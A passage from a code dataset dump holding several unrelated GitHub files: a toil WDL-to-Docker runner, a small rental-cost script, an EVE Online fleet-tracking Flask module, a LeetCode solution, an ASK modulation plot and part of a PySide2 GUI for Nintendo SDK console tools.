i.tsv_dict:\n f.write(str(var))\n f.write(str(i.tsv_dict))\n\n f.write('\\n\\ncsv_dict')\n for var in i.csv_dict:\n f.write(str(var))\n f.write(str(i.csv_dict))\n\n\ndef recursive_glob(job, directoryname, glob_pattern):\n '''\n Walks through a directory and its subdirectories looking for files matching\n the glob_pattern and returns a list=[].\n\n :param job: A \"job\" object representing the current task node \"job\" being\n passed around by toil. Toil's minimum unit of work.\n :param directoryname: Any accessible folder name on the filesystem.\n :param glob_pattern: A string like \"*.txt\", which would find all text files.\n :return: A list=[] of absolute filepaths matching the glob pattern.\n '''\n matches = []\n for root, dirnames, filenames in os.walk(directoryname):\n for filename in fnmatch.filter(filenames, glob_pattern):\n absolute_filepath = os.path.join(root, filename)\n matches.append(absolute_filepath)\n return matches\n\n\ndef heredoc_wdl(template, dictionary={}, indent=''):\n template = textwrap.dedent(template).format(**dictionary)\n return template.replace('\\n', '\\n' + indent) + '\\n'\n\ndef generate_docker_bashscript_file(temp_dir, docker_dir, globs, cmd, job_name):\n '''\n Creates a bashscript to inject into a docker container for the job.\n\n This script wraps the job command(s) given in a bash script, hard links the\n outputs and returns an \"rc\" file containing the exit code. All of this is\n done in an effort to parallel the Broad's cromwell engine, which is the\n native WDL runner. As they've chosen to write and then run a bashscript for\n every command, so shall we.\n\n :param temp_dir: The current directory outside of docker to deposit the\n bashscript into, which will be the bind mount that docker\n loads files from into its own containerized filesystem.\n This is usually the tempDir created by this individual job\n using 'tempDir = job.fileStore.getLocalTempDir()'.\n :param docker_dir: The working directory inside of the docker container\n which is bind mounted to 'temp_dir'. By default this is\n 'data'.\n :param globs: A list of expected output files to retrieve as glob patterns\n that will be returned as hard links to the current working\n directory.\n :param cmd: A bash command to be written into the bash script and run.\n :param job_name: The job's name, only used to write in a file name\n identifying the script as written for that job.\n Will be used to call the script later.\n :return: Nothing, but it writes and deposits a bash script in temp_dir\n intended to be run inside of a docker container for this job.\n '''\n wdl_copyright = heredoc_wdl('''#!/bin/bash\n \n # Borrowed/rewritten from the Broad's Cromwell implementation. As \n # that is under a BSD-ish license, I include here the license off \n # of their GitHub repo. Thank you Broadies!\n \n # Copyright (c) 2015, Broad Institute, Inc.\n # All rights reserved.\n \n # Redistribution and use in source and binary forms, with or without\n # modification, are permitted provided that the following conditions are met:\n \n # * Redistributions of source code must retain the above copyright notice, this\n # list of conditions and the following disclaimer.\n \n # * Redistributions in binary form must reproduce the above copyright notice,\n # this list of conditions and the following disclaimer in the documentation\n # and/or other materials provided with the distribution.\n \n # * Neither the name Broad Institute, Inc. nor the names of its\n # contributors may be used to endorse or promote products derived from\n # this software without specific prior written permission.\n \n # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE\n \n # make a temp directory w/identifier\n ''')\n prefix_dict = {\"docker_dir\": docker_dir,\n \"cmd\": cmd}\n bashfile_prefix = heredoc_wdl('''\n tmpDir=$(mktemp -d /{docker_dir}/execution/tmp.XXXXXX)\n chmod 777 $tmpDir\n # set destination for java to deposit all of its files\n export _JAVA_OPTIONS=-Djava.io.tmpdir=$tmpDir\n export TMPDIR=$tmpDir\n \n (\n cd /{docker_dir}/execution\n {cmd}\n )\n \n # gather the input command return code\n echo $? > \"$tmpDir/rc.tmp\"\n \n ''', prefix_dict)\n\n bashfile_string = wdl_copyright + bashfile_prefix\n\n begin_globbing_string = heredoc_wdl('''\n (\n cd $tmpDir\n mkdir \"$tmpDir/globs\"\n ''')\n\n bashfile_string = bashfile_string + begin_globbing_string\n\n for glob_input in globs:\n add_this_glob = \\\n '( ln -L ' + glob_input + \\\n ' \"$tmpDir/globs\" 2> /dev/null ) || ( ln ' + glob_input + \\\n ' \"$tmpDir/globs\" )\\n'\n bashfile_string = bashfile_string + add_this_glob\n\n bashfile_suffix = heredoc_wdl('''\n )\n \n # flush RAM to disk\n sync\n \n mv \"$tmpDir/rc.tmp\" \"$tmpDir/rc\"\n ''')\n\n bashfile_string = bashfile_string + bashfile_suffix\n\n with open(os.path.join(temp_dir, job_name + '_script.sh'), 'w') as bashfile:\n bashfile.write(bashfile_string)\n\ndef main():\n parser = argparse.ArgumentParser(description='Runs WDL files with toil.')\n parser.add_argument('wdl_file', help='A WDL workflow file.')\n parser.add_argument('secondary_file', help='A secondary data file (json).')\n parser.add_argument('-o',\n '--output_directory',\n required=False,\n default=os.getcwd(),\n help='Optionally specify the directory that outputs '\n 'are written to. Default is the current working dir.')\n parser.add_argument('--gen_parse_files', required=False, default=False,\n help='Creates \"AST.out\", which holds the printed AST and'\n '\"mappings.out\", which holds the printed task, workflow,'\n 'csv, and tsv dictionaries generated by the parser.')\n parser.add_argument('--dont_delete_compiled', required=False, default=False,\n help='Saves the compiled toil script generated from the'\n 'wdl/json files from deletion.')\n\n # wdl_run_args is an array containing all of the unknown arguments not\n # specified by the parser in this main. All of these will be passed down in\n # check_call later to run the compiled toil file.\n args, wdl_run_args = parser.parse_known_args()\n\n wdl_file_path = os.path.abspath(args.wdl_file)\n args.secondary_file = os.path.abspath(args.secondary_file)\n args.output_directory = os.path.abspath(args.output_directory)\n\n w = ToilWDL(wdl_file_path, args.secondary_file, args.output_directory)\n\n # read secondary file; create dictionary to hold variables\n if args.secondary_file.endswith('.json'):\n w.dict_from_JSON(args.secondary_file)\n elif args.secondary_file.endswith('.yml'):\n w.dict_from_YML(args.secondary_file)\n elif args.secondary_file.endswith('.yaml'):\n w.dict_from_YML(args.secondary_file)\n else:\n raise RuntimeError('Unsupported Secondary File Type. Use json.')\n\n # parse the wdl AST into 2 dictionaries\n with open(wdl_file_path, 'r') as wdl:\n wdl_string = wdl.read()\n ast = wdl_parser.parse(wdl_string).ast()\n w.create_tasks_dict(ast)\n w.create_workflows_dict(ast)\n\n # use the AST dictionaries to write 4 strings\n # these are the future 4 sections of the compiled toil python file\n module_section = w.write_modules()\n fn_section = w.write_functions()\n main_section = w.write_main()\n\n # write 3 strings to a python output file\n w.write_python_file(module_section,\n fn_section,\n main_section,\n w.output_file)\n\n wdllogger.debug('WDL file compiled to toil script. Running now.')\n\n if args.gen_parse_files:\n w.write_mappings(w)\n w.write_AST()\n\n cmd = ['python', w.output_file]\n cmd.extend(wdl_run_args)\n subprocess.check_call(cmd)\n\n if not args.dont_delete_compiled:\n os.remove(w.output_file)\n\nif __name__ == '__main__':\n main()","repo_name":"huyu335/toil_ref","sub_path":"wdl/toilwdl.py","file_name":"toilwdl.py","file_ext":"py","file_size_in_byte":100305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41691712130","text":"taxa_dia = float(input(\"Informe a taxa fixa por dia:\"))\ntaxa_km = float(input(\"Informe a taxa por km rodado:\"))\n#desconto sobre a taxa fixa por dia\ndesconto = float(input(\"Informe o desconto(%):\"))\ndias = float(input(\"Quantos dias usou o veículo?\"))\nkm = float(input(\"Quantos quilometros percorreu?\"))\n\ntotal_dias = taxa_dia * dias\nvalor_desconto = (total_dias*desconto/100)\ntotal_dias = total_dias - valor_desconto\n\ntotal_km = taxa_km * km\n\ntotal_aluguel = total_dias + total_km\n\nprint(\"Total do Aluguel:\",total_aluguel)\nprint(\"% Desconto:\",desconto,\"Valor do desconto:\",valor_desconto)\nprint(dias,\"dias com o veículo!\")\nprint(km,\"km rodados!\")\n","repo_name":"Migvalentini/PythonProgramacao","sub_path":"PY 03-24 Ex10.py","file_name":"PY 03-24 Ex10.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72013928232","text":"\"\"\"\n Background processing for connected web apps\n\"\"\"\n\nfrom app.flask_shared_modules import mongo\nfrom app.flask_shared_modules import socketio\nfrom app.flask_shared_modules import esiapp\nfrom app.flask_shared_modules import esiclient\n\nfrom app.routes_helpers import (update_token, EsiException, emit_to_char, decode_fleet_member,\n EsiError, esi_error_check_basic, remove_db_sid, json_serial)\n\nfrom pymongo import ReturnDocument\n\nimport json\nimport logging\n\n\ndef background_fleet(user, sid):\n while True:\n try:\n fleet_doc = update_fleet_metadata(user)\n except (EsiError, EsiException) as e:\n emit_to_char('error', str(e), char_id=user.character_id)\n fleet_doc = mongo.db.fleets.find_one({'id': user.fleet_id})\n\n id_filter = {'id': user.character_id}\n result = mongo.db.characters.find_one(id_filter)\n if sid not in result['sid']:\n remove_db_sid(user.character_id, sid)\n logging.error('sid changed, exiting background update for: %s', sid)\n return\n\n if fleet_doc['fc_id'] != user.character_id:\n if fleet_doc['fc_id'] not in fleet_doc['connected_webapps']:\n emit_to_char('error', 'Fleet Boss is not connected to PELD-Fleet. Please have the Fleet Boss connect to PELD-Fleet', char_id=user.character_id)\n socketio.sleep(5)\n continue\n\n try:\n fleet = get_fleet(user, fleet_doc)\n except EsiError as e:\n emit_to_char('error', str(e), sids=result['sid'])\n socketio.sleep(5)\n continue\n except EsiException as e:\n if str(e) == 'not fleet boss':\n if fleet_doc.get('fc_id', 0) == user.character_id:\n emit_to_char('error', 'You are no longer Fleet Boss. Please have the new Fleet Boss connect to PELD-Fleet', sids=result['sid'])\n socketio.sleep(5)\n continue\n else:\n emit_to_char('exception', str(e), sids=result['sid'])\n return\n \n fleet_serial = json.dumps(fleet, default=json_serial)\n\n # send update to fleet boss\n emit_to_char('fleet_update', fleet_serial, sids=result['sid'])\n if user.character_id in fleet_doc['connected_webapps']:\n fleet_doc['connected_webapps'].remove(user.character_id)\n\n # send update to fleet members who have been granted access\n if fleet_doc['fleet_access']['fleet_commander']:\n char_id = fleet.get('fleet_commander', {}).get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n for wing in fleet['wings']:\n if fleet_doc['fleet_access']['wing_commander']:\n char_id = wing.get('wing_commander', {}).get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n for squad in wing['squads']:\n if fleet_doc['fleet_access']['squad_commander']:\n char_id = squad.get('squad_commander', {}).get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n if fleet_doc['fleet_access']['squad_member'] and 'members' in squad:\n for member in squad['members']:\n char_id = member.get('character_id', 0)\n if char_id in fleet_doc['connected_webapps']:\n emit_to_char('fleet_update', fleet_serial, char_id=char_id)\n fleet_doc['connected_webapps'].remove(char_id)\n for char_id in fleet_doc['connected_webapps']:\n emit_to_char('error', 'Your Fleet Boss has not granted you access to PELD-Fleet. '+\n 'You will not get data until you are granted access', char_id=char_id)\n socketio.sleep(5)\n \ndef update_fleet_metadata(current_user, client=False):\n if client:\n connectedType = 'connected_clients'\n else:\n connectedType = 'connected_webapps'\n\n data_to_update = {}\n update_token(current_user)\n\n op = esiapp.op['get_characters_character_id_fleet'](\n character_id=current_user.get_id()\n )\n fleet = esiclient.request(op)\n esi_error_check_basic(fleet, 'fleet', str(current_user.get_id()))\n\n data_to_update['id'] = fleet.data['fleet_id']\n data_to_update['fc_id'] = fleet.data['fleet_boss_id']\n current_user.set_fleet_id(fleet.data['fleet_id'])\n current_user.set_fleet_role(fleet.data['role'])\n\n # remove from old fleets\n docs = mongo.db.fleets.find({connectedType: current_user.character_id})\n if docs is not None:\n for fleet in docs:\n if fleet['id'] != current_user.fleet_id and current_user.character_id in fleet[connectedType]:\n fleet[connectedType].remove(current_user.character_id)\n update = {'$set': {connectedType: fleet[connectedType]}}\n mongo.db.fleets.update_one({'id': fleet['id']}, update)\n \n _filter = {'id': current_user.fleet_id}\n doc = mongo.db.fleets.find_one(_filter)\n if doc is not None:\n if current_user.character_id not in doc[connectedType]:\n doc[connectedType].append(current_user.character_id)\n data_to_update[connectedType] = doc[connectedType]\n else:\n data_to_update[connectedType] = [current_user.character_id]\n if client:\n data_to_update['connected_webapps'] = []\n else:\n data_to_update['connected_clients'] = []\n data_to_update['members'] = []\n data_to_update['client_access'] = True\n data_to_update['fleet_access'] = {\n 'fleet_commander': False,\n 'wing_commander': False,\n 'squad_commander': False,\n 'squad_member': False\n }\n \n update = {'$set': data_to_update,\n '$currentDate': {'updated_time': {'$type': 'date'} }\n }\n return mongo.db.fleets.find_one_and_update(_filter, update, upsert=True, return_document=ReturnDocument.AFTER)\n\ndef get_fleet(current_user, fleet_doc):\n fleet = {'name': 'Fleet'}\n fleet['wings'] = get_fleet_wings(current_user)\n fleet_members, connected_clients = get_fleet_members(current_user, fleet_doc)\n for member in fleet_members:\n decoded_member = decode_fleet_member(member.copy())\n decoded_member['peld_connected'] = decoded_member['character_id'] in connected_clients\n if member['squad_id'] == -1 and member['wing_id'] == -1:\n fleet['fleet_commander'] = decoded_member\n for wing in fleet['wings']:\n if member['wing_id'] == wing['id']:\n if member['squad_id'] == -1:\n wing['wing_commander'] = decoded_member\n for squad in wing['squads']:\n if member['squad_id'] == squad['id']:\n if member['role_name'].startswith('Squad Commander'):\n squad['squad_commander'] = decoded_member\n else:\n if 'members' not in squad:\n squad['members'] = []\n squad['members'].append(decoded_member)\n fleet['wings'] = sorted(fleet['wings'], key=lambda e:e['id'])\n for wing in fleet['wings']:\n wing['squads'] = sorted(wing['squads'], key=lambda e:e['id'])\n fleet['metadata'] = {\n 'boss': fleet_doc['fc_id'],\n 'fleet_access': fleet_doc['fleet_access'],\n 'client_access': fleet_doc['client_access']\n }\n return fleet\n\ndef get_fleet_members(current_user, fleet_doc):\n update_token(current_user)\n op = esiapp.op['get_fleets_fleet_id_members'](\n fleet_id=current_user.fleet_id\n )\n fleet = esiclient.request(op)\n if fleet.status >= 400 and fleet.status < 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet members for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n if fleet.status == 404:\n if error_string == \"Not found\":\n raise EsiError(error_string)\n raise EsiException('not fleet boss')\n else:\n raise EsiError(error_string)\n elif fleet.status >= 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet members for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n raise EsiError(error_string)\n new_members = [member['character_id'] for member in fleet.data]\n\n data_to_update = {}\n # audit conncted sockets to ensure they are still in fleet\n for member in fleet_doc.get('connected_clients', []):\n if member not in new_members:\n fleet_doc['connected_clients'].remove(member)\n data_to_update['connected_clients'] = fleet_doc.get('connected_clients', [])\n for member in fleet_doc.get('connected_webapps', []):\n if member not in new_members:\n fleet_doc['connected_webapps'].remove(member)\n emit_to_char('error', 'You are no longer in the fleet', char_id=member)\n data_to_update['connected_webapps'] = fleet_doc.get('connected_webapps', [])\n \n data_to_update['id'] = current_user.fleet_id\n data_to_update['fc_id'] = current_user.character_id\n data_to_update['members'] = new_members\n update = {'$set': data_to_update, \n '$currentDate': {'updated_time': {'$type': 'date'} }\n }\n _filter = {'id': current_user.fleet_id}\n mongo.db.fleets.update_one(_filter, update, upsert=True)\n return fleet.data, data_to_update['connected_clients']\n\ndef get_fleet_wings(current_user):\n update_token(current_user)\n op = esiapp.op['get_fleets_fleet_id_wings'](\n fleet_id=current_user.fleet_id\n )\n fleet = esiclient.request(op)\n if fleet.status >= 400 and fleet.status < 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet wings for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n if fleet.status == 404:\n if error_string == \"Not found\":\n raise EsiError(error_string)\n raise EsiException('not fleet boss')\n else:\n raise EsiError(error_string)\n elif fleet.status >= 500:\n error_string = fleet.data['error'] if fleet.data else str(fleet.status)\n logging.error('error getting fleet wings for: %s', current_user.get_id())\n logging.error('error is: %s', error_string)\n raise EsiError(error_string)\n fleet.data.sort(key=lambda x: x['id'])\n for wing in fleet.data:\n wing['squads'].sort(key=lambda x: x['id'])\n return fleet.data\n\n","repo_name":"ArtificialQualia/PELD-Server","sub_path":"app/background_fleet.py","file_name":"background_fleet.py","file_ext":"py","file_size_in_byte":11254,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"28482146834","text":"# https://leetcode.com/problems/longest-consecutive-sequence/\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n numset = set(nums)\n longest = 0\n\n for num in nums:\n if num - 1 not in numset:\n length = 0\n counter = num\n while counter in numset:\n counter += 1\n length += 1\n longest = max(length, longest)\n\n return longest\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_12/longest-consecutive-sequence.py","file_name":"longest-consecutive-sequence.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15732951014","text":"import numpy as np\r\nimport pylab as plt\r\n\r\n\r\ndef S2BS(s):\r\n result = []\r\n for c in s:\r\n bit = bin(ord(c))[2:]\r\n if len(bit) < 8:\r\n bit = '0' + bit\r\n result.extend([int(x) for x in bit])\r\n return result\r\n\r\n\r\ndef za1(A1, f, t, phi):\r\n return A1 * np.sin(2 * np.pi * f * t + phi)\r\n\r\n\r\ndef za2(A2, f, t, phi):\r\n return A2 * np.sin(2 * np.pi * f * t + phi)\r\n\r\n\r\ndef DFT(n):\r\n xk = []\r\n for i in range(len(n)):\r\n temp = 0\r\n for j in range(len(n)):\r\n temp += n[j] * np.exp(1j * 2 * np.pi / len(n)) ** (-i * j)\r\n xk.append(temp)\r\n return xk\r\n\r\n\r\ndef M(x):\r\n Re = np.real(x)\r\n Im = np.imag(x)\r\n mk = []\r\n for i in range(0, len(Re)):\r\n mk.append(np.sqrt(Re[i] ** 2 + Im[i] ** 2))\r\n return mk\r\n\r\n\r\n\r\ndef sygASK():\r\n N = 1 / Tb\r\n f = N / Tb\r\n ASK = []\r\n for t in czas:\r\n if x[int(t)] == 0:\r\n ASK.append(za1(A1, f, t, phi))\r\n else:\r\n ASK.append(za2(A2, f, t, phi))\r\n return ASK\r\n\r\n\r\ndef widmoASK():\r\n N = 2\r\n f = N / Tb\r\n wASK = []\r\n for t in czas2:\r\n if x[int(t)] == 0:\r\n wASK.append(za1(A1, f, t, phi))\r\n else:\r\n wASK.append(za2(A2, f, t, phi))\r\n return wASK\r\n\r\n\r\nx = S2BS('text')\r\nprint(x)\r\n# [0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 0]\r\nA1 = 1\r\nA2 = 0\r\nTb = 1\r\nphi = 0\r\nczas = np.arange(0, len(x), 0.1)\r\nczas2 = np.arange(0, 10, 0.1)\r\n\r\nASK = sygASK()\r\nwASK = widmoASK()\r\nplt.plot(czas, ASK)\r\nplt.title(\"Zad2 dla ASK\")\r\nplt.xlabel('czas')\r\nplt.show()\r\n\r\nplt.plot(czas2, wASK)\r\nplt.title(\"Zad3 dla ASK\")\r\nplt.xlabel('czas')\r\nplt.show()\r\n\r\nplt.plot(czas, M(DFT(ASK)))\r\nplt.title(\"Zad4 Widmo dla ASK\")\r\nplt.show()\r\n\r\nmax = np.max(ASK)\r\nmin = np.min(ASK)\r\nw = max - min\r\nprint(w)\r\n# W = 1.9021130325903224\r\n","repo_name":"tl45136/Python","sub_path":"Transmisja_Danych/LAB_05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33012055816","text":"import sys\nimport re\nimport subprocess\nfrom subprocess import *\nimport os\nimport PySide2.QtWidgets as QtWidgets\nimport PySide2.QtCore as QtCore\nfrom PySide2.QtGui import *\n\nclass My_Main_Dialog(QtWidgets.QWidget):\n def __init__(self,title):\n super().__init__()\n self.setWindowTitle(title)\n #self.setMinimumHeight(300)\n #self.setMinimumWidth(400)\n self.setFixedSize(400,330)\n self.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n self.create_widgets()\n self.create_layout()\n\n def create_widgets(self):\n self.Main_Menu = QtWidgets.QMenuBar()\n self.File_Menu = self.Main_Menu.addMenu('&File')\n self.View_Menu = self.Main_Menu.addMenu('&View')\n self.Console_Menu = self.Main_Menu.addMenu('&Console')\n self.Tool_Menu = self.Main_Menu.addMenu('&Tool')\n self.Help_Menu = self.Main_Menu.addMenu('&Help')\n # File_Menu\n self.Set_name = self.File_Menu.addAction('Set your console &name')\n self.File_Menu.addSeparator()\n # self.Exit_app.setIcon(QIcon(\"exit.png\"))\n self.Set_name.triggered.connect(self.set_name)\n self.Swich_app = self.File_Menu.addAction('&Switch to Home Menu')\n self.File_Menu.addSeparator()\n #self.Exit_app.setIcon(QIcon(\"exit.png\"))\n self.Swich_app.triggered.connect(self.swich_app)\n self.Exit_app = self.File_Menu.addAction('&Exit')\n self.Exit_app.setIcon(QIcon(\"exit.png\"))\n self.Exit_app.triggered.connect(self.exit_app)\n #View_Menu\n self.Firmware = self.View_Menu.addAction(\"&Console Firmware Version\")\n self.View_Menu.addSeparator()\n self.Firmware.triggered.connect(self.firmware_info)\n self.App_List = self.View_Menu.addAction(\"&Installed App List\")\n self.View_Menu.addSeparator()\n self.App_List.triggered.connect(self.application_list)\n self.Console_List = self.View_Menu.addAction('&Registered Target List')\n self.View_Menu.addSeparator()\n self.Console_List.triggered.connect(self.console_list)\n #Console_Menu\n self.Connect_Console = self.Console_Menu.addAction('&Connect')\n self.Connect_Console.setIcon(QIcon(\"connect.png\"))\n self.Console_Menu.addSeparator()\n self.Connect_Console.triggered.connect(self.connect_console)\n self.Disconnect_Console = self.Console_Menu.addAction('&Disconnect')\n self.Disconnect_Console.setIcon(QIcon(\"disconnect.png\"))\n self.Console_Menu.addSeparator()\n self.Disconnect_Console.triggered.connect(self.disconnect_console)\n self.Power_Off = self.Console_Menu.addAction('&Power off')\n self.Power_Off.setIcon(QIcon(\"stand-by.png\"))\n self.Console_Menu.addSeparator()\n self.Power_Off.triggered.connect(self.power_off)\n self.Reboot = self.Console_Menu.addAction('&Reboot')\n self.Reboot.setIcon(QIcon(\"reboot.png\"))\n self.Console_Menu.addSeparator()\n self.Reboot.triggered.connect(self.reboot)\n #Help_Menu\n self.About = self.Help_Menu.addAction('&About')\n self.About.setIcon(QIcon(\"about.png\"))\n self.Help_Menu.addSeparator()\n self.About.triggered.connect(self.about)\n self.Link_menu = self.Help_Menu.addMenu(\"&Links\")\n self.Link_menu.setIcon(QIcon(\"link.png\"))\n self.Home = QtWidgets.QAction(\"&Switch Home\")\n self.Home.setIcon(QIcon(\"home.png\"))\n self.Train_Doc = QtWidgets.QAction(\"&Training Documents\")\n self.Train_Doc.setIcon(QIcon(\"Train_document.png\"))\n self.NDI_Doc = QtWidgets.QAction(\"&NDI Documents\")\n self.NDI_Doc.setIcon(QIcon(\"ndi_document.png\"))\n self.Link_menu.addAction(self.Home)\n self.Link_menu.addSeparator()\n self.Document = self.Link_menu.addMenu(\"&Documents\")\n self.Document.setIcon(QIcon(\"documents.png\"))\n self.Home.triggered.connect(self.home_url)\n self.Document.addAction(self.Train_Doc)\n self.Document.addSeparator()\n self.Train_Doc.triggered.connect(self.training_doc_explorer)\n self.Document.addAction(self.NDI_Doc)\n self.NDI_Doc.triggered.connect(self.ndi_doc)\n\n\n def create_layout(self):\n self.Main_layout = QtWidgets.QVBoxLayout()\n self.Tab_Widget = QtWidgets.QTabWidget()\n self.Tab_Widget.addTab(Tab_Media(), \"Media and Attachments\")\n self.Tab_Widget.addTab(Tab_Applications(), \"Manage Applications\")\n self.Main_layout.addWidget(self.Tab_Widget)\n self.setLayout(self.Main_layout)\n self.Main_layout.setMenuBar(self.Main_Menu)\n\n\n '''***************** File Menu Functions' Declaration *****************'''\n '''Set name to console'''\n def set_name(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Set_name_input = QtWidgets.QInputDialog()\n text, ok = self.Set_name_input.getText(self, 'Console Name', 'Make sure console is connected first. \\n\\nEnter name for your console:')\n self.Set_name_input.setOkButtonText(\"datta\")\n if ok and text:\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe set-name ' + text\n subprocess.Popen(comm)\n New_name = \"\" + text + \"\"\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Name set Information \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Console Name has been set to: \" +New_name)\n sms_box.setInformativeText(\"Please check Target Name column of Target Manager to reflect changes.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n\n '''Switch boot menu to Home'''\n def swich_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Switch to Home Menu: \")\n self.sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n self.sms_box.setText('''Are you sure you want to use this option? If you click Yes, console will restart.''')\n self.sms_box.setInformativeText('''Please use this option only once (after you initialize console) to set console's Initial Boot Menu to Home Menu.''')\n self.sms_box.setDetailedText('''This option is used when you want to set console's Initial Boot Menu as \"HOME MENU\" (Usally after initialization)''')\n self.sms_box.setStandardButtons(self.sms_box.Yes | self.sms_box.No)\n self.sms_box.setDefaultButton(self.sms_box.No)\n self.sms_box.setIcon(self.sms_box.Warning)\n self.press = self.sms_box.exec_()\n\n if self.press == self.sms_box.Yes:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\TargetShell.exe switch-menu --menu=homemenu --reset')\n else:\n self.sms_box.close()\n\n '''Exit the application'''\n def exit_app(self):\n self.close()\n\n\n '''***************** View Menu Functions' Declaration *****************'''\n '''Firmware Information'''\n def firmware_info(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Console_Firmware = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe firmware-version')\n self.Firm_Result = self.Console_Firmware.decode(\"latin1\", 'ignore').split('\\n')\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Firmware \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(self.Firm_Result[0])\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n '''get application list'''\n def application_list(self):\n Alive_out = 